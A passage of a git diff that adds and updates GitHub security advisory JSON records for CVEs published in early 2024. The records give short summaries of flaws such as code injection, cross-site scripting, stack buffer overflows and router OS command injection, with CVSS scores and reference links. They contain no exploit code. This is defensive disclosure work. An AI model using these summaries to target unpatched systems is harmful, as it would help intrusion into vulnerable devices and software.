"severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json b/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json index 04bb5a376f849..2e2e4e3a1f1c3 100644 --- a/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json +++ b/advisories/unreviewed/2024/01/GHSA-jxfv-m3f6-ch5r/GHSA-jxfv-m3f6-ch5r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jxfv-m3f6-ch5r", - "modified": "2024-01-24T00:30:33Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:33Z", "aliases": [ "CVE-2024-0814" ], "details": "Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json b/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json index 7cddab10c9daa..63abc0907c0c2 100644 --- a/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json +++ b/advisories/unreviewed/2024/01/GHSA-m2r6-996j-pvf6/GHSA-m2r6-996j-pvf6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m2r6-996j-pvf6", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0804" ], "details": "Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json b/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json new file mode 100644 index 0000000000000..9823290b1e815 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m3mr-pjj3-2g74/GHSA-m3mr-pjj3-2g74.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3mr-pjj3-2g74", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2023-46838" + ], + "details": "Transmit requests in Xen's virtual network protocol can consist of\nmultiple parts. While not really useful, except for the initial part\nany of them may be of zero length, i.e. carry no data at all. Besides a\ncertain initial portion of the to be transferred data, these parts are\ndirectly translated into what Linux calls SKB fragments. Such converted\nrequest parts can, when for a particular SKB they are all of length\nzero, lead to a de-reference of NULL in core networking code.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46838" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGEKT4DKSDXDS34EL7M4UVJMMPH7Z3ZZ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/" + }, + { + "type": "WEB", + "url": "https://xenbits.xenproject.org/xsa/advisory-448.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T11:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json new file mode 100644 index 0000000000000..f7de03edc9d25 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m525-p4rf-7h93", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23790" + ], + "details": "Improper Input Validation vulnerability in the upload functionality for user avatars allows functionality misuse due to missing check of filetypes.\nThis issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023 through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23790" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-01/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-354" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json b/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json new file mode 100644 index 0000000000000..43617565ebbcb --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m5qf-4xvf-462h/GHSA-m5qf-4xvf-462h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5qf-4xvf-462h", + "modified": "2024-01-31T15:30:19Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2023-7043" + ], + "details": "Unquoted service path in ESET products allows to \n\ndrop a prepared program to a specific location and run on boot with the \n\nNT AUTHORITY\\NetworkService permissions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7043" + }, + { + "type": "WEB", + "url": "https://support.eset.com/en/ca8602" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json b/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json new file mode 100644 index 0000000000000..3e4ea42510633 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m653-22c6-v2w8/GHSA-m653-22c6-v2w8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m653-22c6-v2w8", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7204" + ], + "details": "The WP STAGING WordPress Backup plugin before 3.2.0 allows access to cache files during the cloning process which provides", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7204" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/65a8cf83-d6cc-4d4c-a482-288a83a69879/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-668" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json b/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json new file mode 100644 index 0000000000000..e9b1d74ecb7a8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-m866-467g-64fm/GHSA-m866-467g-64fm.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m866-467g-64fm", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1117" + ], + "details": "A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1117" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/Liu1nbjddxu4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252475" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252475" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json b/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json index fd081562eb517..c2c8bc840ee8e 100644 --- a/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json +++ b/advisories/unreviewed/2024/01/GHSA-mcx8-9rrj-7qxm/GHSA-mcx8-9rrj-7qxm.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0567" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0567" @@ -33,10 +37,18 @@ "type": "WEB", "url": "https://gitlab.com/gnutls/gnutls/-/issues/1521" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0011/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json b/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json index 15b491acbe6b3..c7c9a1ba8a57e 100644 --- a/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json +++ b/advisories/unreviewed/2024/01/GHSA-mf35-vrf5-mh78/GHSA-mf35-vrf5-mh78.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mf35-vrf5-mh78", - "modified": "2024-01-24T09:30:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T09:30:25Z", "aliases": [ "CVE-2023-43317" ], "details": "An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T07:15:46Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json b/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json index 5558b2124d9ab..9a1dfa7bae323 100644 --- a/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json +++ b/advisories/unreviewed/2024/01/GHSA-mff6-fp66-7vrp/GHSA-mff6-fp66-7vrp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mff6-fp66-7vrp", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0752" ], "details": "A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json b/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json index dd9b870159674..680af466a4065 100644 --- a/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json +++ b/advisories/unreviewed/2024/01/GHSA-mfgp-fvpm-hx5v/GHSA-mfgp-fvpm-hx5v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mfgp-fvpm-hx5v", - "modified": "2024-01-25T03:30:58Z", + "modified": "2024-02-08T03:32:45Z", "published": "2024-01-17T21:30:21Z", "aliases": [ "CVE-2023-44077" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44077" }, + { + "type": "WEB", + "url": "https://khronokernel.com/macos/2024/01/18/CVE-2023-44077.html" + }, { "type": "WEB", "url": "https://support.studionetworksolutions.com/hc/en-us/articles/22494658980244-ShareBrowser-v-7-0-Released" diff --git a/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json b/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json index 4a251e5c41e22..76ab25491b616 100644 --- a/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json +++ b/advisories/unreviewed/2024/01/GHSA-mfm9-9c5w-7f5g/GHSA-mfm9-9c5w-7f5g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mfm9-9c5w-7f5g", - "modified": "2024-01-23T00:30:31Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-23T00:30:31Z", "aliases": [ "CVE-2021-42141" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T23:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json b/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json index ad9b76b5f68cd..b5cfdc0afd043 100644 --- a/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json +++ b/advisories/unreviewed/2024/01/GHSA-mgr5-ggf9-pgjr/GHSA-mgr5-ggf9-pgjr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mgr5-ggf9-pgjr", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47195" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47196.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json b/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json index 005b86b321817..e5ce329848893 100644 --- a/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json +++ b/advisories/unreviewed/2024/01/GHSA-mh49-xg6j-w6xh/GHSA-mh49-xg6j-w6xh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mh49-xg6j-w6xh", - "modified": "2024-01-24T06:30:18Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T06:30:18Z", "aliases": [ "CVE-2024-22372" ], "details": "OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T05:15:14Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json b/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json index 9d38e4ddd5688..07f919fececea 100644 --- a/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json +++ b/advisories/unreviewed/2024/01/GHSA-mj6p-jggh-hr8w/GHSA-mj6p-jggh-hr8w.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20961" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json b/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json index 5bb5089ec11c8..f203fa2c758a1 100644 --- a/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json +++ b/advisories/unreviewed/2024/01/GHSA-mmc5-hgpc-m8q5/GHSA-mmc5-hgpc-m8q5.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7192" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-7192" diff --git a/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json b/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json index 579c20a6c61a5..883d12a9f4fa5 100644 --- a/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json +++ b/advisories/unreviewed/2024/01/GHSA-mmx8-j2r4-x8r6/GHSA-mmx8-j2r4-x8r6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mmx8-j2r4-x8r6", - "modified": "2024-01-19T18:30:29Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-19T18:30:29Z", "aliases": [ "CVE-2023-47034" ], "details": "A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json b/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json new file mode 100644 index 0000000000000..23a0d9816eac1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mq7v-2xj4-rhjj/GHSA-mq7v-2xj4-rhjj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq7v-2xj4-rhjj", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-30T12:30:18Z", + "aliases": [ + "CVE-2024-22894" + ], + "details": "An issue in AIT-Deutschland Alpha Innotec Heatpumps wp2reg-V.3.88.0-9015 and Novelan Heatpumps wp2reg-V.3.88.0-9015, allows remote attackers to execute arbitrary code via the password component in the shadow file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22894" + }, + { + "type": "WEB", + "url": "https://github.com/Jaarden/AlphaInnotec-Password-Vulnerability/" + }, + { + "type": "WEB", + "url": "https://github.com/Jaarden/CVE-2024-22894" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json b/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json index bf11c47e6c235..2239b926ddae1 100644 --- a/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json +++ b/advisories/unreviewed/2024/01/GHSA-mqpp-vj24-2f9c/GHSA-mqpp-vj24-2f9c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mqpp-vj24-2f9c", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51208" ], "details": "An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json b/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json new file mode 100644 index 0000000000000..6831b4fae6fab --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mr4x-vwjp-hm5f/GHSA-mr4x-vwjp-hm5f.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mr4x-vwjp-hm5f", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-1031" + ], + "details": "A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1031" + }, + { + "type": "WEB", + "url": "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252304" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252304" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json b/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json new file mode 100644 index 0000000000000..896afc1f14ce5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mrf8-vvv3-qvpr/GHSA-mrf8-vvv3-qvpr.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mrf8-vvv3-qvpr", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0993" + ], + "details": "A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0993" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252258" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252258" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json b/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json index 12a8a0c1ee22a..974ec2635236a 100644 --- a/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json +++ b/advisories/unreviewed/2024/01/GHSA-mvvq-wfcg-vq6m/GHSA-mvvq-wfcg-vq6m.json @@ 